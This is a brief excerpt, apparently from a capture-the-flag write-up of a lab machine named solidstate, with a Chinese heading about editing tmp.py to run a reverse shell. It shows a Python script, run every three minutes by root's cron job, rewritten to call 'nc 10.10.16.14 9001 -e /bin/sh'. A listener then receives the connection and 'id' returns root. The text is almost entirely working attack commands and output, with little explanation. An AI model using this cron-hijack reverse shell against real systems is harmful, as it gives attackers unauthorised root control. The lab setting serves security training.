2025/10/26 21:33:01 CMD: UID=0 PID=1508 | sh -c rm -r /tmp/*修改tmp.py脚本执行反弹命令
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('nc 10.10.16.14 9001 -e /bin/sh')
except:
sys.exit()
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.10.51] 50362
id
uid=0(root) gid=0(root) groups=0(root)
crontab -l
# Edit this file to introduce tasks to be run by cron.
...[snip]...
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/3 * * * * python /opt/tmp.py